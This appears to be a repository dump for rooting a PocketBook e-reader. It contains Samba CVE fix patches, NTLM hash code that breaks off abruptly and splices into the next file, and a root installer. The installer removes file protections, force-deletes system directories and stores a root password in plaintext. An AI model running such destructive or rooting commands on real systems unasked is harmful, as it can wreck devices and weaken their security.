78 | + * Ensure client isn't asking us to write more than
79 | + * they sent. CVE-2017-12163.
80 | + */
81 | + remaining = smbreq_bufrem(req, data);
82 | + if (numtowrite > remaining) {
83 | + reply_nterror(req, NT_STATUS_INVALID_PARAMETER);
84 | + END_PROFILE(SMBwrite);
85 | + return;
86 | + }
87 | +
88 | if (!fsp->print_file) {
89 | init_strict_lock_struct(fsp, (uint64_t)req->smbpid,
90 | (uint64_t)startpos, (uint64_t)numtowrite, WRITE_LOCK,
91 | @@ -4525,6 +4557,9 @@ void reply_write_and_X(struct smb_reques
92 | return;
93 | }
94 | } else {
95 | + /*
96 | + * This already protects us against CVE-2017-12163.
97 | + */
98 | if (smb_doff > smblen || smb_doff + numtowrite < numtowrite ||
99 | smb_doff + numtowrite > smblen) {
100 | reply_nterror(req, NT_STATUS_INVALID_PARAMETER);
101 | @@ -4894,6 +4929,7 @@ void reply_writeclose(struct smb_request
102 | {
103 | connection_struct *conn = req->conn;
104 | size_t numtowrite;
105 | + size_t remaining;
106 | ssize_t nwritten = -1;
107 | NTSTATUS close_status = NT_STATUS_OK;
108 | SMB_OFF_T startpos;
109 | @@ -4927,6 +4963,17 @@ void reply_writeclose(struct smb_request
110 | mtime = convert_time_t_to_timespec(srv_make_unix_date3(req->vwv+4));
111 | data = (const char *)req->buf + 1;
112 |
113 | + /*
114 | + * Ensure client isn't asking us to write more than
115 | + * they sent. CVE-2017-12163.
116 | + */
117 | + remaining = smbreq_bufrem(req, data);
118 | + if (numtowrite > remaining) {
119 | + reply_nterror(req, NT_STATUS_INVALID_PARAMETER);
120 | + END_PROFILE(SMBwriteclose);
121 | + return;
122 | + }
123 | +
124 | if (!fsp->print_file) {
125 | init_strict_lock_struct(fsp, (uint64_t)req->smbpid,
126 | (uint64_t)startpos, (uint64_t)numtowrite, WRITE_LOCK,
127 | @@ -5497,6 +5544,9 @@ void reply_printwrite(struct smb_request
128 |
129 | numtowrite = SVAL(req->buf, 1);
130 |
131 | + /*
132 | + * This already protects us against CVE-2017-12163.
133 | + */
134 | if (req->buflen < numtowrite + 3) {
135 | reply_nterror(req, NT_STATUS_INVALID_PARAMETER);
136 | END_PROFILE(SMBsplwr);
137 |
--------------------------------------------------------------------------------
/samba-patches/025-CVE-2016-2112-v3-6.patch:
--------------------------------------------------------------------------------
1 | From 126e3e992bed7174d60ee19212db9b717647ab2e Mon Sep 17 00:00:00 2001
2 | From: Andreas Schneider
3 | Date: Wed, 30 Mar 2016 16:55:44 +0200
4 | Subject: [PATCH 1/3] CVE-2016-2112: s3:ntlmssp: Implement missing
5 | ntlmssp_have_feature()
6 |
7 | Signed-off-by: Andreas Schneider
8 | ---
9 | source3/include/proto.h | 1 +
10 | source3/libsmb/ntlmssp.c | 30 ++++++++++++++++++++++++++++++
11 | 2 files changed, 31 insertions(+)
12 |
13 | --- a/source3/include/proto.h
14 | +++ b/source3/include/proto.h
15 | @@ -1260,6 +1260,7 @@ NTSTATUS ntlmssp_set_password(struct ntl
16 | NTSTATUS ntlmssp_set_domain(struct ntlmssp_state *ntlmssp_state, const char *domain) ;
17 | void ntlmssp_want_feature_list(struct ntlmssp_state *ntlmssp_state, char *feature_list);
18 | void ntlmssp_want_feature(struct ntlmssp_state *ntlmssp_state, uint32_t feature);
19 | +bool ntlmssp_have_feature(struct ntlmssp_state *ntlmssp_state, uint32_t feature);
20 | NTSTATUS ntlmssp_update(struct ntlmssp_state *ntlmssp_state,
21 | const DATA_BLOB in, DATA_BLOB *out) ;
22 | NTSTATUS ntlmssp_server_start(TALLOC_CTX *mem_ctx,
23 | --- a/source3/libsmb/ntlmssp.c
24 | +++ b/source3/libsmb/ntlmssp.c
25 | @@ -162,6 +162,36 @@ NTSTATUS ntlmssp_set_domain(struct ntlms
26 | return NT_STATUS_OK;
27 | }
28 |
29 | +bool ntlmssp_have_feature(struct ntlmssp_state *ntlmssp_state,
30 | + uint32_t feature)
31 | +{
32 | + if (feature & NTLMSSP_FEATURE_SIGN) {
33 | + if (ntlmssp_state->session_key.length == 0) {
34 | + return false;
35 | + }
36 | + if (ntlmssp_state->neg_flags & NTLMSSP_NEGOTIATE_SIGN) {
37 | + return true;
38 | + }
39 | + }
40 | +
41 | + if (feature & NTLMSSP_FEATURE_SEAL) {
42 | + if (ntlmssp_state->session_key.length == 0) {
43 | + return false;
44 | + }
45 | + if (ntlmssp_state->neg_flags & NTLMSSP_NEGOTIATE_SEAL) {
46 | + return true;
47 | + }
48 | + }
49 | +
50 | + if (feature & NTLMSSP_FEATURE_SESSION_KEY) {
51 | + if (ntlmssp_state->session_key.length > 0) {
52 | + return true;
53 | + }
54 | + }
55 | +
56 | + return false;
57 | +}
58 | +
59 | /**
60 | * Request features for the NTLMSSP negotiation
61 | *
62 | --- a/source3/libads/sasl.c
63 | +++ b/source3/libads/sasl.c
64 | @@ -261,6 +261,37 @@ static ADS_STATUS ads_sasl_spnego_ntlmss
65 | /* we have a reference conter on ntlmssp_state, if we are signing
66 | then the state will be kept by the signing engine */
67 |
68 | + if (ads->ldap.wrap_type >= ADS_SASLWRAP_TYPE_SEAL) {
69 | + bool ok;
70 | +
71 | + ok = ntlmssp_have_feature(ntlmssp_state,
72 | + NTLMSSP_FEATURE_SEAL);
73 | + if (!ok) {
74 | + DEBUG(0,("The ntlmssp feature sealing request, but unavailable\n"));
75 | + TALLOC_FREE(ntlmssp_state);
76 | + return ADS_ERROR_NT(NT_STATUS_INVALID_NETWORK_RESPONSE);
77 | + }
78 | +
79 | + ok = ntlmssp_have_feature(ntlmssp_state,
80 | + NTLMSSP_FEATURE_SIGN);
81 | + if (!ok) {
82 | + DEBUG(0,("The ntlmssp feature signing request, but unavailable\n"));
83 | + TALLOC_FREE(ntlmssp_state);
84 | + return ADS_ERROR_NT(NT_STATUS_INVALID_NETWORK_RESPONSE);
85 | + }
86 | +
87 | + } else if (ads->ldap.wrap_type >= ADS_SASLWRAP_TYPE_SIGN) {
88 | + bool ok;
89 | +
90 | + ok = ntlmssp_have_feature(ntlmssp_state,
91 | + NTLMSSP_FEATURE_SIGN);
92 | + if (!ok) {
93 | + DEBUG(0,("The gensec feature signing request, but unavailable\n"));
94 | + TALLOC_FREE(ntlmssp_state);
95 | + return ADS_ERROR_NT(NT_STATUS_INVALID_NETWORK_RESPONSE);
96 | + }
97 | + }
98 | +
99 | if (ads->ldap.wrap_type > ADS_SASLWRAP_TYPE_PLAIN) {
100 | ads->ldap.out.max_unwrapped = ADS_SASL_WRAPPING_OUT_MAX_WRAPPED - NTLMSSP_SIG_SIZE;
101 | ads->ldap.out.sig_size = NTLMSSP_SIG_SIZE;
102 | --- a/docs-xml/smbdotconf/ldap/clientldapsaslwrapping.xml
103 | +++ b/docs-xml/smbdotconf/ldap/clientldapsaslwrapping.xml
104 | @@ -34,11 +34,9 @@
105 |
106 |
107 |
108 | - The default value is plain which is not irritable
109 | - to KRB5 clock skew errors. That implies synchronizing the time
110 | - with the KDC in the case of using sign or
111 | - seal.
112 | + The default value is sign. That implies synchronizing the time
113 | + with the KDC in the case of using Kerberos.
114 |
115 |
116 | -plain
117 | +sign
118 |
119 | --- a/source3/param/loadparm.c
120 | +++ b/source3/param/loadparm.c
121 | @@ -5392,6 +5392,8 @@ static void init_globals(bool reinit_glo
122 | Globals.ldap_debug_level = 0;
123 | Globals.ldap_debug_threshold = 10;
124 |
125 | + Globals.client_ldap_sasl_wrapping = ADS_AUTH_SASL_SIGN;
126 | +
127 | /* This is what we tell the afs client. in reality we set the token
128 | * to never expire, though, when this runs out the afs client will
129 | * forget the token. Set to 0 to get NEVERDATE.*/
130 |
--------------------------------------------------------------------------------
/samba-patches/015-patch-cve-2015-7560.patch:
--------------------------------------------------------------------------------
1 | From eb27f9b7bf9c1dc902d9545eecf805831bd4e46c Mon Sep 17 00:00:00 2001
2 | From: Jeremy Allison
3 | Date: Tue, 5 Jan 2016 11:18:12 -0800
4 | Subject: [PATCH 1/8] CVE-2015-7560: s3: smbd: Add refuse_symlink() function
5 | that can be used to prevent operations on a symlink.
6 |
7 | BUG: https://bugzilla.samba.org/show_bug.cgi?id=11648
8 |
9 | Signed-off-by: Jeremy Allison
10 | Reviewed-by: Michael Adam
11 | ---
12 | source3/smbd/trans2.c | 28 ++++++++++++++++++++++++++++
13 | 1 file changed, 28 insertions(+)
14 |
15 | --- a/source3/smbd/trans2.c
16 | +++ b/source3/smbd/trans2.c
17 | @@ -51,6 +51,34 @@ static char *store_file_unix_basic_info2
18 | files_struct *fsp,
19 | const SMB_STRUCT_STAT *psbuf);
20 |
21 | +/****************************************************************************
22 | + Check if an open file handle or pathname is a symlink.
23 | +****************************************************************************/
24 | +
25 | +static NTSTATUS refuse_symlink(connection_struct *conn,
26 | + const files_struct *fsp,
27 | + const char *name)
28 | +{
29 | + SMB_STRUCT_STAT sbuf;
30 | + const SMB_STRUCT_STAT *pst = NULL;
31 | +
32 | + if (fsp) {
33 | + pst = &fsp->fsp_name->st;
34 | + } else {
35 | + int ret = vfs_stat_smb_fname(conn,
36 | + name,
37 | + &sbuf);
38 | + if (ret == -1) {
39 | + return map_nt_error_from_unix(errno);
40 | + }
41 | + pst = &sbuf;
42 | + }
43 | + if (S_ISLNK(pst->st_ex_mode)) {
44 | + return NT_STATUS_ACCESS_DENIED;
45 | + }
46 | + return NT_STATUS_OK;
47 | +}
48 | +
49 | /********************************************************************
50 | Roundup a value to the nearest allocation roundup size boundary.
51 | Only do this for Windows clients.
52 | @@ -181,12 +209,22 @@ NTSTATUS get_ea_names_from_file(TALLOC_C
53 | char **names, **tmp;
54 | size_t num_names;
55 | ssize_t sizeret = -1;
56 | + NTSTATUS status;
57 | +
58 | + if (pnames) {
59 | + *pnames = NULL;
60 | + }
61 | + *pnum_names = 0;
62 |
63 | if (!lp_ea_support(SNUM(conn))) {
64 | - if (pnames) {
65 | - *pnames = NULL;
66 | - }
67 | - *pnum_names = 0;
68 | + return NT_STATUS_OK;
69 | + }
70 | +
71 | + status = refuse_symlink(conn, fsp, fname);
72 | + if (!NT_STATUS_IS_OK(status)) {
73 | + /*
74 | + * Just return no EA's on a symlink.
75 | + */
76 | return NT_STATUS_OK;
77 | }
78 |
79 | @@ -236,10 +274,6 @@ NTSTATUS get_ea_names_from_file(TALLOC_C
80 |
81 | if (sizeret == 0) {
82 | TALLOC_FREE(names);
83 | - if (pnames) {
84 | - *pnames = NULL;
85 | - }
86 | - *pnum_names = 0;
87 | return NT_STATUS_OK;
88 | }
89 |
90 | @@ -550,6 +584,7 @@ NTSTATUS set_ea(connection_struct *conn,
91 | const struct smb_filename *smb_fname, struct ea_list *ea_list)
92 | {
93 | char *fname = NULL;
94 | + NTSTATUS status;
95 |
96 | if (!lp_ea_support(SNUM(conn))) {
97 | return NT_STATUS_EAS_NOT_SUPPORTED;
98 | @@ -559,6 +594,12 @@ NTSTATUS set_ea(connection_struct *conn,
99 | return NT_STATUS_ACCESS_DENIED;
100 | }
101 |
102 | + status = refuse_symlink(conn, fsp, smb_fname->base_name);
103 | + if (!NT_STATUS_IS_OK(status)) {
104 | + return status;
105 | + }
106 | +
107 | +
108 | /* For now setting EAs on streams isn't supported. */
109 | fname = smb_fname->base_name;
110 |
111 | @@ -4931,6 +4972,13 @@ NTSTATUS smbd_do_qfilepathinfo(connectio
112 | uint16 num_file_acls = 0;
113 | uint16 num_def_acls = 0;
114 |
115 | + status = refuse_symlink(conn,
116 | + fsp,
117 | + smb_fname->base_name);
118 | + if (!NT_STATUS_IS_OK(status)) {
119 | + return status;
120 | + }
121 | +
122 | if (fsp && fsp->fh->fd != -1) {
123 | file_acl = SMB_VFS_SYS_ACL_GET_FD(fsp);
124 | } else {
125 | @@ -6452,6 +6500,7 @@ static NTSTATUS smb_set_posix_acl(connec
126 | uint16 num_def_acls;
127 | bool valid_file_acls = True;
128 | bool valid_def_acls = True;
129 | + NTSTATUS status;
130 |
131 | if (total_data < SMB_POSIX_ACL_HEADER_SIZE) {
132 | return NT_STATUS_INVALID_PARAMETER;
133 | @@ -6479,6 +6528,11 @@ static NTSTATUS smb_set_posix_acl(connec
134 | return NT_STATUS_INVALID_PARAMETER;
135 | }
136 |
137 | + status = refuse_symlink(conn, fsp, smb_fname->base_name);
138 | + if (!NT_STATUS_IS_OK(status)) {
139 | + return status;
140 | + }
141 | +
142 | DEBUG(10,("smb_set_posix_acl: file %s num_file_acls = %u, num_def_acls = %u\n",
143 | smb_fname ? smb_fname_str_dbg(smb_fname) : fsp_str_dbg(fsp),
144 | (unsigned int)num_file_acls,
145 | --- a/source3/smbd/nttrans.c
146 | +++ b/source3/smbd/nttrans.c
147 | @@ -877,6 +877,12 @@ NTSTATUS set_sd(files_struct *fsp, struc
148 | return NT_STATUS_OK;
149 | }
150 |
151 | + if (S_ISLNK(fsp->fsp_name->st.st_ex_mode)) {
152 | + DEBUG(10, ("ACL set on symlink %s denied.\n",
153 | + fsp_str_dbg(fsp)));
154 | + return NT_STATUS_ACCESS_DENIED;
155 | + }
156 | +
157 | if (psd->owner_sid == NULL) {
158 | security_info_sent &= ~SECINFO_OWNER;
159 | }
160 | @@ -1925,6 +1931,12 @@ NTSTATUS smbd_do_query_security_desc(con
161 | return NT_STATUS_ACCESS_DENIED;
162 | }
163 |
164 | + if (S_ISLNK(fsp->fsp_name->st.st_ex_mode)) {
165 | + DEBUG(10, ("ACL get on symlink %s denied.\n",
166 | + fsp_str_dbg(fsp)));
167 | + return NT_STATUS_ACCESS_DENIED;
168 | + }
169 | +
170 | if (security_info_wanted & (SECINFO_DACL|SECINFO_OWNER|
171 | SECINFO_GROUP|SECINFO_SACL)) {
172 | /* Don't return SECINFO_LABEL if anything else was
173 |
--------------------------------------------------------------------------------
/ntlmhash.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 |
4 | //Init values
5 | #define INIT_A 0x67452301
6 | #define INIT_B 0xefcdab89
7 | #define INIT_C 0x98badcfe
8 | #define INIT_D 0x10325476
9 |
10 | #define SQRT_2 0x5a827999
11 | #define SQRT_3 0x6ed9eba1
12 |
13 | unsigned int nt_buffer[16];
14 | unsigned int output[4];
15 | char hex_format[33];
16 | char itoa16[16] = "0123456789ABCDEF";
17 |
18 | //This is the MD4 compress function
19 | static void ntlm_crypt()
20 | {
21 | unsigned int a = INIT_A;
22 | unsigned int b = INIT_B;
23 | unsigned int c = INIT_C;
24 | unsigned int d = INIT_D;
25 |
26 | /* Round 1 */
27 | a += (d ^ (b & (c ^ d))) + nt_buffer[0] ;a = (a << 3 ) | (a >> 29);
28 | d += (c ^ (a & (b ^ c))) + nt_buffer[1] ;d = (d << 7 ) | (d >> 25);
29 | c += (b ^ (d & (a ^ b))) + nt_buffer[2] ;c = (c << 11) | (c >> 21);
30 | b += (a ^ (c & (d ^ a))) + nt_buffer[3] ;b = (b << 19) | (b >> 13);
31 |
32 | a += (d ^ (b & (c ^ d))) + nt_buffer[4] ;a = (a << 3 ) | (a >> 29);
33 | d += (c ^ (a & (b ^ c))) + nt_buffer[5] ;d = (d << 7 ) | (d >> 25);
34 | c += (b ^ (d & (a ^ b))) + nt_buffer[6] ;c = (c << 11) | (c >> 21);
35 | b += (a ^ (c & (d ^ a))) + nt_buffer[7] ;b = (b << 19) | (b >> 13);
36 |
37 | a += (d ^ (b & (c ^ d))) + nt_buffer[8] ;a = (a << 3 ) | (a >> 29);
38 | d += (c ^ (a & (b ^ c))) + nt_buffer[9] ;d = (d << 7 ) | (d >> 25);
39 | c += (b ^ (d & (a ^ b))) + nt_buffer[10] ;c = (c << 11) | (c >> 21);
40 | b += (a ^ (c & (d ^ a))) + nt_buffer[11] ;b = (b << 19) | (b >> 13);
41 |
42 | a += (d ^ (b & (c ^ d))) + nt_buffer[12] ;a = (a << 3 ) | (a >> 29);
43 | d += (c ^ (a & (b ^ c))) + nt_buffer[13] ;d = (d << 7 ) | (d >> 25);
44 | c += (b ^ (d & (a ^ b))) + nt_buffer[14] ;c = (c << 11) | (c >> 21);
45 | b += (a ^ (c & (d ^ a))) + nt_buffer[15] ;b = (b << 19) | (b >> 13);
46 |
47 | /* Round 2 */
48 | a += ((b & (c | d)) | (c & d)) + nt_buffer[0] +SQRT_2; a = (a<<3 ) | (a>>29);
49 | d += ((a & (b | c)) | (b & c)) + nt_buffer[4] +SQRT_2; d = (d<<5 ) | (d>>27);
50 | c += ((d & (a | b)) | (a & b)) + nt_buffer[8] +SQRT_2; c = (c<<9 ) | (c>>23);
51 | b += ((c & (d | a)) | (d & a)) + nt_buffer[12]+SQRT_2; b = (b<<13) | (b>>19);
52 |
53 | a += ((b & (c | d)) | (c & d)) + nt_buffer[1] +SQRT_2; a = (a<<3 ) | (a>>29);
54 | d += ((a & (b | c)) | (b & c)) + nt_buffer[5] +SQRT_2; d = (d<<5 ) | (d>>27);
55 | c += ((d & (a | b)) | (a & b)) + nt_buffer[9] +SQRT_2; c = (c<<9 ) | (c>>23);
56 | b += ((c & (d | a)) | (d & a)) + nt_buffer[13]+SQRT_2; b = (b<<13) | (b>>19);
57 |
58 | a += ((b & (c | d)) | (c & d)) + nt_buffer[2] +SQRT_2; a = (a<<3 ) | (a>>29);
59 | d += ((a & (b | c)) | (b & c)) + nt_buffer[6] +SQRT_2; d = (d<<5 ) | (d>>27);
60 | c += ((d & (a | b)) | (a & b)) + nt_buffer[10]+SQRT_2; c = (c<<9 ) | (c>>23);
61 | b += ((c & (d | a)) | (d & a)) + nt_buffer[14]+SQRT_2; b = (b<<13) | (b>>19);
62 |
63 | a += ((b & (c | d)) | (c & d)) + nt_buffer[3] +SQRT_2; a = (a<<3 ) | (a>>29);
64 | d += ((a & (b | c)) | (b & c)) + nt_buffer[7] +SQRT_2; d = (d<<5 ) | (d>>27);
65 | c += ((d & (a | b)) | (a & b)) + nt_buffer[11]+SQRT_2; c = (c<<9 ) | (c>>23);
66 | b += ((c & (d | a)) | (d & a)) + nt_buffer[15]+SQRT_2; b = (b<<13) | (b>>19);
67 |
68 | /* Round 3 */
69 | a += (d ^ c ^ b) + nt_buffer[0] + SQRT_3; a = (a << 3 ) | (a >> 29);
70 | d += (c ^ b ^ a) + nt_buffer[8] + SQRT_3; d = (d << 9 ) | (d >> 23);
71 | c += (b ^ a ^ d) + nt_buffer[4] + SQRT_3; c = (c << 11) | (c >> 21);
72 | b += (a ^ d ^ c) + nt_buffer[12] + SQRT_3; b = (b << 15) | (b >> 17);
73 |
74 | a += (d ^ c ^ b) + nt_buffer[2] + SQRT_3; a = (a << 3 ) | (a >> 29);
75 | d += (c ^ b ^ a) + nt_buffer[10] + SQRT_3; d = (d << 9 ) | (d >> 23);
76 | c += (b ^ a ^ d) + nt_buffer[6] + SQRT_3; c = (c << 11) | (c >> 21);
77 | b += (a ^ d ^ c) + nt_buffer[14] + SQRT_3; b = (b << 15) | (b >> 17);
78 |
79 | a += (d ^ c ^ b) + nt_buffer[1] + SQRT_3; a = (a << 3 ) | (a >> 29);
80 | d += (c ^ b ^ a) + nt_buffer[9] + SQRT_3; d = (d << 9 ) | (d >> 23);
81 | c += (b ^ a ^ d) + nt_buffer[5] + SQRT_3; c = (c << 11) | (c >> 21);
82 | b += (a ^ d ^ c) + nt_buffer[13] + SQRT_3; b = (b << 15) | (b >> 17);
83 |
84 | a += (d ^ c ^ b) + nt_buffer[3] + SQRT_3; a = (a << 3 ) | (a >> 29);
85 | d += (c ^ b ^ a) + nt_buffer[11] + SQRT_3; d = (d << 9 ) | (d >> 23);
86 | c += (b ^ a ^ d) + nt_buffer[7] + SQRT_3; c = (c << 11) | (c >> 21);
87 | b += (a ^ d ^ c) + nt_buffer[15] + SQRT_3; b = (b << 15) | (b >> 17);
88 |
89 | output[0] = a + INIT_A;
90 | output[1] = b + INIT_B;
91 | output[2] = c + INIT_C;
92 | output[3] = d + INIT_D;
93 | }
94 |
95 | //This include the Unicode conversion and the padding
96 | static void prepare_key(char *key)
97 | {
98 | int i=0;
99 | int length=strlen(key);
100 | memset(nt_buffer,0,16*4);
101 | //The length of key need to be <= 27
102 | for(;i$install_log
8 | exec 2>&1
9 | set -x
10 |
11 | iv2sh SetActiveTask `pidof bookshelf.app` 0
12 | PVER=`cat /mnt/secure/.pkgver`
13 |
14 | base=/mnt/ext1/system/config/settings
15 | settings=$base/settings.json
16 | rootset=$base/rootsettings.json
17 | old=/ebrmain/config/settings/settings.json
18 |
19 | function remove_bind() {
20 | umount -l /usr/share/terminfo
21 | umount -l /ebrmain/bin/netagent
22 | umount -l /var/tmp/netagent.orig
23 | for n in ins_usbnet rm_usbnet ins_usb_mod rm_usb_mod usb_test; do
24 | umount -l /lib/modules/$n.sh
25 | done
26 | }
27 |
28 | bk=/var/tmp/backup_etc
29 | function backup_config() {
30 | mkdir /var/tmp/backup_etc
31 | cp -af /mnt/secure/etc/firewall $bk
32 | cp -af /mnt/secure/etc/*passwd $bk
33 | cp -af /mnt/secure/etc/*.conf $bk
34 | }
35 | function restore_config() {
36 | cp -af $bk/* /mnt/secure/etc/
37 | }
38 |
39 |
40 | function uninstall() {
41 | remove_bind
42 | chattr -i /mnt/secure/runonce/*.sh
43 | rm -rf /mnt/secure/runonce/*.sh /mnt/secure/bin /mnt/secure/etc /mnt/secure/lib /mnt/secure/.pkgver
44 | rm -f $settings
45 | mv -f $settings.old $settings
46 | # if settings is missing, will be copied from system
47 |
48 | dialog 2 "" "Services uninstalled, restart is needed." "Restart now" "Restart later"
49 | if [ $? == 1 ]; then
50 | sync
51 | reboot
52 | fi
53 | exit 0
54 | }
55 |
56 | if [ "$PVER" != "" ]; then
57 | if [ "$PVER" != "$PKGVER" ]; then
58 | dialog 1 "" "Version $PVER already installed" "Update to $PKGVER" "Cancel" "Uninstall"
59 | st=$?
60 | if [ $st == 3 ]; then
61 | uninstall
62 | elif [ $st == 2 ]; then
63 | exit 0
64 | fi
65 | else
66 | dialog 1 "" "Version $PVER already installed." "Cancel" "Uninstall"
67 | if [ $? == 2 ]; then
68 | uninstall
69 | fi
70 | exit 0
71 | fi
72 | else
73 | dialog 1 "" "Do you wish to install $PKGVER?" "Yes" "No"
74 | if [ $? != 1 ]; then
75 | exit 0
76 | fi
77 | fi
78 | echo $PKGVER > /mnt/secure/.pkgver
79 | mkdir -p /mnt/ext1/public_html
80 | echo "*.html files are served from here if 'HTTP server' option is enabled. dynamic pages can be served by *.cgi scripts." > /mnt/ext1/public_html/index.html
81 | mkdir /mnt/ext1/public
82 | echo 'Files in here are served to public via smb:\\pocketbook\public, ftp://anonymous@pocketbook and http://pocketbook/public/' > /mnt/ext1/public/README.txt
83 | mkdir /mnt/ext1/.ssh
84 | mkdir -p /mnt/ext1/system/etc/init.d
85 | mkdir -p /mnt/ext1/system/config/settings
86 |
87 | ARCHIVE=`awk '/^__DATA/ {print NR + 1; exit 0; }' $0`
88 |
89 | #try *very* aggressively to remove everything that could stand in our way
90 |
91 | remove_bind
92 | backup_config
93 |
94 | chattr -i /mnt/secure/runonce/*.sh
95 | chattr -i /mnt/secure/init.d
96 | chattr -i /mnt/secure/rcS
97 | chattr -i /mnt/secure/etc
98 | chattr -i /mnt/secure/init.d/*
99 | rm -rf /mnt/secure/init.d #old location
100 | rm -f /mnt/secure/rcS #old location
101 | rm -f /mnt/secure/.pkgver
102 | rm -rf /mnt/secure/etc /mnt/secure/bin /mnt/secure/lib
103 |
104 | echo "Extracting"
105 | chmod 755 /mnt/secure
106 | tail -n+$ARCHIVE $0 | (cd /mnt/secure && tar xvz -C /mnt/secure)
107 |
108 | if [ $? != 0 ]; then
109 | dialog 3 "" "Install files extraction failed. See `basename $install_log`" "OK"
110 | exit 1
111 | fi
112 |
113 | restore_config
114 |
115 | chattr +i /mnt/secure/runonce/*.sh /mnt/secure/su
116 | if [ ! -e /mnt/secure/etc/passwd ]; then
117 | PW=$RANDOM
118 | echo -n password=$PW > /mnt/ext1/rootpassword.txt
119 | fi
120 |
121 |
122 | if [ -e $settings ] && ! grep rootsettings $settings> /dev/null; then
123 | old=$settings.old
124 | mv -f $settings $old
125 | fi
126 |
127 | if [ ! -e $settings ]; then
128 | cat <<_EOF > $settings
129 | [
130 |
131 | {
132 | "control_type" : "submenu",
133 | "icon_id" : "ci_system",
134 | "from_file" : "./rootsettings.json",
135 | "title_id" : "Rooted device settings",
136 | },
137 | _EOF
138 | tail -n +2 $old >> $settings
139 | fi
140 |
141 | cat <<_EOF > $rootset
142 | [
143 | {
144 | "control_type" : "executable",
145 | "icon_id" : "ci_softwareinfo",
146 | "id" : "rootapply",
147 | "storage" : [ "/mnt/secure/bin/sysstat.app" ],
148 | "title_id" : "System status"
149 | },
150 | {
151 | "control_type" : "executable",
152 | "icon_id" : "ci_swupdate",
153 | "id" : "rootapply",
154 | "storage" : [ "/mnt/secure/bin/applysettings.app" ],
155 | "title_id" : "Reboot to apply changes"
156 | },
157 | {
158 | "id" : "password_set",
159 | "title_id" : "Root password",
160 | "icon_id" : "ci_set_password",
161 | "control_type" : "edit",
162 | "kind" : "text",
163 | "default" : "(keep unchanged)",
164 | "storage" : ["/mnt/ext1/rootpassword.txt, password"],
165 | }
166 | _EOF
167 | for n in /mnt/secure/etc/init.d/*.sh; do
168 | desc="$(head -2 $n | tail -1)"
169 | if [ "${desc:0:2}" != "##" ]; then
170 | continue
171 | fi
172 | desc=${desc:2}
173 | n=${n##*/}
174 | bn=${n:3}
175 | id=${bn/.sh/}
176 | cat <<_EOF >> $rootset
177 | ,{
178 | "id": "root_$id",
179 | "storage" : [ "\${SYSTEM_CONFIG_PATH}/rootsettings.cfg, $id" ],
180 | "values" : [ ":0:@Off", ":1:@On" ],
181 | "control_type" : "switch",
182 | "kind": "none",
183 | "default" : ":1:@On",
184 | "title_id" : "$desc",
185 | }
186 | _EOF
187 | done
188 | echo "]" >> $rootset
189 |
190 |
191 |
192 | sync
193 | dialog 1 "" "Services installed, restart is needed to get em running." "Restart now" "Restart later"
194 | if [ $? == 1 ]; then
195 | sync
196 | /sbin/reboot
197 | fi
198 | exit 0
199 | __DATA
200 |
--------------------------------------------------------------------------------
/samba-patches/250-remove_domain_logon.patch:
--------------------------------------------------------------------------------
1 | --- a/source3/rpc_server/rpc_ep_setup.c
2 | +++ b/source3/rpc_server/rpc_ep_setup.c
3 | @@ -606,6 +606,7 @@ static bool samr_init_cb(void *ptr)
4 | return true;
5 | }
6 |
7 | +#ifdef NETLOGON_SUPPORT
8 | static bool netlogon_init_cb(void *ptr)
9 | {
10 | struct dcesrv_ep_context *ep_ctx =
11 | @@ -654,6 +655,7 @@ static bool netlogon_init_cb(void *ptr)
12 |
13 | return true;
14 | }
15 | +#endif
16 |
17 | static bool spoolss_init_cb(void *ptr)
18 | {
19 | @@ -1116,12 +1118,15 @@ bool dcesrv_ep_setup(struct tevent_conte
20 | return false;
21 | }
22 |
23 | +#ifdef NETLOGON_SUPPORT
24 | netlogon_cb.init = netlogon_init_cb;
25 | netlogon_cb.shutdown = NULL;
26 | netlogon_cb.private_data = ep_ctx;
27 | if (!NT_STATUS_IS_OK(rpc_netlogon_init(&netlogon_cb))) {
28 | return false;
29 | }
30 | +#endif
31 | +
32 |
33 | rpcsrv_type = lp_parm_const_string(GLOBAL_SECTION_SNUM,
34 | "rpc_server",
35 | --- a/source3/librpc/rpc/rpc_common.c
36 | +++ b/source3/librpc/rpc/rpc_common.c
37 | @@ -103,9 +103,11 @@ static bool initialize_interfaces(void)
38 | if (!smb_register_ndr_interface(&ndr_table_samr)) {
39 | return false;
40 | }
41 | +#ifdef NETLOGON_SUPPORT
42 | if (!smb_register_ndr_interface(&ndr_table_netlogon)) {
43 | return false;
44 | }
45 | +#endif
46 | if (!smb_register_ndr_interface(&ndr_table_srvsvc)) {
47 | return false;
48 | }
49 | --- a/source3/smbd/server_exit.c
50 | +++ b/source3/smbd/server_exit.c
51 | @@ -156,7 +156,9 @@ static void exit_server_common(enum serv
52 | rpc_winreg_shutdown();
53 | #endif
54 |
55 | +#ifdef NETLOGON_SUPPORT
56 | rpc_netlogon_shutdown();
57 | +#endif
58 | rpc_samr_shutdown();
59 | rpc_lsarpc_shutdown();
60 | }
61 | --- a/source3/rpc_server/svcctl/srv_svcctl_nt.c
62 | +++ b/source3/rpc_server/svcctl/srv_svcctl_nt.c
63 | @@ -91,9 +91,11 @@ bool init_service_op_table( void )
64 | i++;
65 | #endif
66 |
67 | +#ifdef NETLOGON_SUPPORT
68 | svcctl_ops[i].name = talloc_strdup( svcctl_ops, "NETLOGON" );
69 | svcctl_ops[i].ops = &netlogon_svc_ops;
70 | i++;
71 | +#endif
72 |
73 | #ifdef WINREG_SUPPORT
74 | svcctl_ops[i].name = talloc_strdup( svcctl_ops, "RemoteRegistry" );
75 | --- a/source3/nmbd/nmbd_processlogon.c
76 | +++ b/source3/nmbd/nmbd_processlogon.c
77 | @@ -320,6 +320,10 @@ void process_logon_packet(struct packet_
78 | NTSTATUS status;
79 | const char *pdc_name;
80 |
81 | +#ifndef NETLOGON_SUPPORT
82 | + return;
83 | +#endif
84 | +
85 | in_addr_to_sockaddr_storage(&ss, p->ip);
86 | pss = iface_ip((struct sockaddr *)&ss);
87 | if (!pss) {
88 | --- a/source3/rpcclient/rpcclient.c
89 | +++ b/source3/rpcclient/rpcclient.c
90 | @@ -627,7 +627,9 @@ static struct cmd_set *rpcclient_command
91 | #ifdef PRINTER_SUPPORT
92 | spoolss_commands,
93 | #endif
94 | +#ifdef NETLOGON_SUPPORT
95 | netlogon_commands,
96 | +#endif
97 | srvsvc_commands,
98 | #ifdef DFS_SUPPORT
99 | dfs_commands,
100 | --- a/source3/rpc_server/wkssvc/srv_wkssvc_nt.c
101 | +++ b/source3/rpc_server/wkssvc/srv_wkssvc_nt.c
